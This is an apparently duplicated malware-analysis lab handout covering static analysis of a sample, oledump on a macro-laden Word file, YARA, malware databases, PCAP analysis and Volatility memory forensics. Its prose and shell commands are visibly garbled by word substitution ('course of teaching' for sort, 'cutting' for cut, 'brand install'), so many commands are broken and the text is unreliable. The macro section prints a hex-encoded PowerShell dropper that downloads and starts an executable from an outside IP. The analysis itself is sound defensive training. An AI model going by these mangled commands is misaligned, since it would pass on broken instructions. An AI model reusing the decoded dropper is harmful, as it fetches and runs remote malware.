############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts
- Log inwards to your Ubuntu organisation amongst the username 'malware' in addition to the password 'malware'.
- After logging delight opened upward a concluding window in addition to type the next commands:
cd Desktop/
- This is actual Malware (remmeber to run it inwards a VM - the password to extract it is 'infected':
cd /home/infosecaddicts/Desktop/
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
unzip malware-password-is-infected.zip
infected
file malware.exe
mv malware.exe malware.pdf
file malware.pdf
mv malware.pdf malware.exe
hexdump -n two -C malware.exe
***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html
objdump -x malware.exe
strings malware.exe
strings --all malware.exe | caput -n 6
strings malware.exe | grep -i dll
strings malware.exe | grep -i library
strings malware.exe | grep -i reg
strings malware.exe | grep -i hkey
strings malware.exe | grep -i hku
- We didn't run into anything similar HKLM, HKCU or other registry type stuff
strings malware.exe | grep -i irc
strings malware.exe | grep -i join
strings malware.exe | grep -i admin
strings malware.exe | grep -i list
- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
sudo apt-get install -y python-pefile
malware
vi analyse_malware.py
python analyse_malware.py malware.exe
Building a Malware Scanner
--------------------------
mkdir /Desktop/malwarescanner
cd /Desktop/malwarescanner
wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
unzip master.zip
cd malwarescanner-master/
python scanner.py -h
cat strings.txt
cat hashes.txt
mkdir /Desktop/malcode
cp /Desktop/malware.exe /Desktop/malcode
python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
cd /Desktop/
#####################################################
# Analyzing Macro Embedded Malware #
# Reference: #
# https://jon.glass/analyzes-dridex-malware-p1/ #
#####################################################
cp /Desktop/
- Create a FREE trace of piece of occupation organisation human relationship on:
https://malwr.com/account/signup/
- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
file /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
cat /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
sudo pip install olefile
malware
mkdir /Desktop/oledump
cd /Desktop/oledump
wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
unzip oledump_V0_0_22.zip
cp /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
-----------------------------------------------------------------------------------------------------------------------------------
sudo pip install olefile
malware
mkdir /Desktop/oledump
cd /Desktop/oledump
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip
unzip 064016.zip
infected
python oledump.py 064016.doc
python oledump.py 064016.doc -s A4 -v
- From this nosotros tin privy run into this Word physician contains an embedded file called editdata.mso which contains 7 information streams.
- Three of the information streams are flagged every bit macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
python oledump.py 064016.doc -s A5 -v
- As far every bit I tin privy tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
python oledump.py 064016.doc -s A3 -v
- Look for "GVhkjbjv" in addition to you lot should see:
636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
- Take that long blob that starts amongst 636D in addition to finishes amongst 653B in addition to glue it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
##############
# Yara Ninja #
##############
sudo apt-get take -y yara
malware
wget https://github.com/plusvic/yara/archive/v3.4.0.zip
sudo apt-get -y install libtool
malware
unzip v3.4.0.zip
cd yara-3.4.0
./bootstrap.sh
./configure
make
sudo brand install
malware
yara -v
cd ..
wget https://github.com/Yara-Rules/rules/archive/master.zip
unzip master.zip
cd /Desktop
yara rules-master/packer.yar malcode/malware.exe
Places to larn to a greater extent than Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara
Yara dominion sorting script:
-------------------------
https://github.com/mkayoh/yarasorter
cd /Desktop/rules-master
for i inwards $( ls *.yar --hide=master.yar ); practice echo include \"$i\";done > master.yar
cd /Desktop/
yara rules-master/master.yar malcode/malware.exe
Here is a two i grand one thousand sample malware DB created past times Derek Morton that you lot tin privy usage to outset your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2
Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/
###############################
# Creating a Malware Database #
###############################
Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
malware
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
unzip malware-password-is-infected.zip
infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e
Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the next ascendancy inwards the terminal:
sudo apt-get install mysql-server
malware
- Step 2: Installing Python MySQLdb module
- Run the next ascendancy inwards the terminal:
sudo apt-get build-dep python-mysqldb
malware
sudo apt-get install python-mysqldb
malware
Step 3: Logging inwards
Run the next ascendancy inwards the terminal:
mysql -u origin -p (set a password of 'malware')
- Then create i database past times running next command:
create database malware;
exit;
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
vi mal_to_db.py (fill inwards database connectedness information)
python mal_to_db.py -i
------- cheque it to run into if the files tabular array was created ------
mysql -u origin -p
malware
show databases;
use malware;
show tables;
describe files;
exit;
---------------------------------
- Now add together the malicious file to the DB
python mal_to_db.py -f malware.exe -u
- Now cheque to run into if it is inwards the DB
mysql -u origin -p
malware
mysql> usage malware;
select id,md5,sha1,sha256,time FROM files;
mysql> quit;
#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics
ls | grep pcap
perl chaosreader.pl suspicious-time.pcap
firefox index.html
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | course of teaching | uniq -c | course of teaching -nr
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
malware
for i inwards session_00[0-9]*.www.html; practice srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cutting -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cutting -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | course of teaching -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | course of teaching -u
#############################
# PCAP Analysis amongst tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | course of teaching -u
tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | course of teaching -u
tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | course of teaching | uniq
tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | course of teaching |uniq
tshark -r suspicious-time.pcap -qz ip_hosts,tree
tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
whois rapidshare.com.eyu32.ru
whois sploitme.com.cn
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
tshark -r suspicious-time.pcap -qz http_req,tree
tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
######################################
# PCAP Analysis amongst forensicPCAP.py #
######################################
cd /Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
sudo easy_install cmd2
malware
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
ForPCAP >>> help
Prints stats almost PCAP
ForPCAP >>> stat
Prints all DNS requests from the PCAP file. The id earlier the DNS is the packet's id which tin privy hold upward usage amongst the "show" command.
ForPCAP >>> dns
ForPCAP >>> show
Prints all destination ports from the PCAP file. The id earlier the DNS is the packet's id which tin privy hold upward usage amongst the "show" command.
ForPCAP >>> dstports
ForPCAP >>> show
Prints the release of ip source in addition to shop them.
ForPCAP >>> ipsrc
ForPCAP >>> show
Prints the release of web's requests in addition to shop them
ForPCAP >>> web
ForPCAP >>> show
Prints the release of mail's requests in addition to shop them
ForPCAP >>> mail
ForPCAP >>> show
###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
***Takes a few min***
strings 1752.dmp | grep "^http://" | course of teaching | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object eleven 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
cat malicious.js
*****Sorry - no fourth dimension to encompass javascript de-obfuscation today*****
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file inwards $(ls *.dmp); practice echo $file; strings $file | grep bankofamerica; done
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user: infosecaddicts
pass: infosecaddicts
- Log inwards to your Ubuntu organisation amongst the username 'malware' in addition to the password 'malware'.
- After logging delight opened upward a concluding window in addition to type the next commands:
cd Desktop/
- This is actual Malware (remmeber to run it inwards a VM - the password to extract it is 'infected':
cd /home/infosecaddicts/Desktop/
wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
unzip malware-password-is-infected.zip
infected
file malware.exe
mv malware.exe malware.pdf
file malware.pdf
mv malware.pdf malware.exe
hexdump -n two -C malware.exe
***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html
objdump -x malware.exe
strings malware.exe
strings --all malware.exe | caput -n 6
strings malware.exe | grep -i dll
strings malware.exe | grep -i library
strings malware.exe | grep -i reg
strings malware.exe | grep -i hkey
strings malware.exe | grep -i hku
- We didn't run into anything similar HKLM, HKCU or other registry type stuff
strings malware.exe | grep -i irc
strings malware.exe | grep -i join
strings malware.exe | grep -i admin
strings malware.exe | grep -i list
- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
sudo apt-get install -y python-pefile
malware
vi analyse_malware.py
python analyse_malware.py malware.exe
Building a Malware Scanner
--------------------------
mkdir /Desktop/malwarescanner
cd /Desktop/malwarescanner
wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
unzip master.zip
cd malwarescanner-master/
python scanner.py -h
cat strings.txt
cat hashes.txt
mkdir /Desktop/malcode
cp /Desktop/malware.exe /Desktop/malcode
python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
cd /Desktop/
#####################################################
# Analyzing Macro Embedded Malware #
# Reference: #
# https://jon.glass/analyzes-dridex-malware-p1/ #
#####################################################
cp /Desktop/
- Create a FREE trace of piece of occupation organisation human relationship on:
https://malwr.com/account/signup/
- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
file /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
cat /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
sudo pip install olefile
malware
mkdir /Desktop/oledump
cd /Desktop/oledump
wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
unzip oledump_V0_0_22.zip
cp /Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
-----------------------------------------------------------------------------------------------------------------------------------
sudo pip install olefile
malware
mkdir /Desktop/oledump
cd /Desktop/oledump
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip
unzip 064016.zip
infected
python oledump.py 064016.doc
python oledump.py 064016.doc -s A4 -v
- From this nosotros tin privy run into this Word physician contains an embedded file called editdata.mso which contains 7 information streams.
- Three of the information streams are flagged every bit macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
python oledump.py 064016.doc -s A5 -v
- As far every bit I tin privy tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
python oledump.py 064016.doc -s A3 -v
- Look for "GVhkjbjv" in addition to you lot should see:
636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
- Take that long blob that starts amongst 636D in addition to finishes amongst 653B in addition to glue it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
##############
# Yara Ninja #
##############
sudo apt-get take -y yara
malware
wget https://github.com/plusvic/yara/archive/v3.4.0.zip
sudo apt-get -y install libtool
malware
unzip v3.4.0.zip
cd yara-3.4.0
./bootstrap.sh
./configure
make
sudo brand install
malware
yara -v
cd ..
wget https://github.com/Yara-Rules/rules/archive/master.zip
unzip master.zip
cd /Desktop
yara rules-master/packer.yar malcode/malware.exe
Places to larn to a greater extent than Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara
Yara dominion sorting script:
-------------------------
https://github.com/mkayoh/yarasorter
cd /Desktop/rules-master
for i inwards $( ls *.yar --hide=master.yar ); practice echo include \"$i\";done > master.yar
cd /Desktop/
yara rules-master/master.yar malcode/malware.exe
Here is a two i grand one thousand sample malware DB created past times Derek Morton that you lot tin privy usage to outset your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2
Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/
###############################
# Creating a Malware Database #
###############################
Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
malware
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
unzip malware-password-is-infected.zip
infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e
Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the next ascendancy inwards the terminal:
sudo apt-get install mysql-server
malware
- Step 2: Installing Python MySQLdb module
- Run the next ascendancy inwards the terminal:
sudo apt-get build-dep python-mysqldb
malware
sudo apt-get install python-mysqldb
malware
Step 3: Logging inwards
Run the next ascendancy inwards the terminal:
mysql -u origin -p (set a password of 'malware')
- Then create i database past times running next command:
create database malware;
exit;
wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
vi mal_to_db.py (fill inwards database connectedness information)
python mal_to_db.py -i
------- cheque it to run into if the files tabular array was created ------
mysql -u origin -p
malware
show databases;
use malware;
show tables;
describe files;
exit;
---------------------------------
- Now add together the malicious file to the DB
python mal_to_db.py -f malware.exe -u
- Now cheque to run into if it is inwards the DB
mysql -u origin -p
malware
mysql> usage malware;
select id,md5,sha1,sha256,time FROM files;
mysql> quit;
#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics
ls | grep pcap
perl chaosreader.pl suspicious-time.pcap
firefox index.html
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | course of teaching | uniq -c | course of teaching -nr
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
malware
for i inwards session_00[0-9]*.www.html; practice srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cutting -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cutting -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | course of teaching -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | course of teaching -u
#############################
# PCAP Analysis amongst tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | course of teaching -u
tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | course of teaching -u
tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | course of teaching | uniq
tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | course of teaching |uniq
tshark -r suspicious-time.pcap -qz ip_hosts,tree
tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
whois rapidshare.com.eyu32.ru
whois sploitme.com.cn
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
tshark -r suspicious-time.pcap -qz http_req,tree
tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
######################################
# PCAP Analysis amongst forensicPCAP.py #
######################################
cd /Desktop
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
sudo easy_install cmd2
malware
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
ForPCAP >>> help
Prints stats almost PCAP
ForPCAP >>> stat
Prints all DNS requests from the PCAP file. The id earlier the DNS is the packet's id which tin privy hold upward usage amongst the "show" command.
ForPCAP >>> dns
ForPCAP >>> show
Prints all destination ports from the PCAP file. The id earlier the DNS is the packet's id which tin privy hold upward usage amongst the "show" command.
ForPCAP >>> dstports
ForPCAP >>> show
Prints the release of ip source in addition to shop them.
ForPCAP >>> ipsrc
ForPCAP >>> show
Prints the release of web's requests in addition to shop them
ForPCAP >>> web
ForPCAP >>> show
Prints the release of mail's requests in addition to shop them
ForPCAP >>> mail
ForPCAP >>> show
###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
***Takes a few min***
strings 1752.dmp | grep "^http://" | course of teaching | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object eleven 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
cat malicious.js
*****Sorry - no fourth dimension to encompass javascript de-obfuscation today*****
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file inwards $(ls *.dmp); practice echo $file; strings $file | grep bankofamerica; done
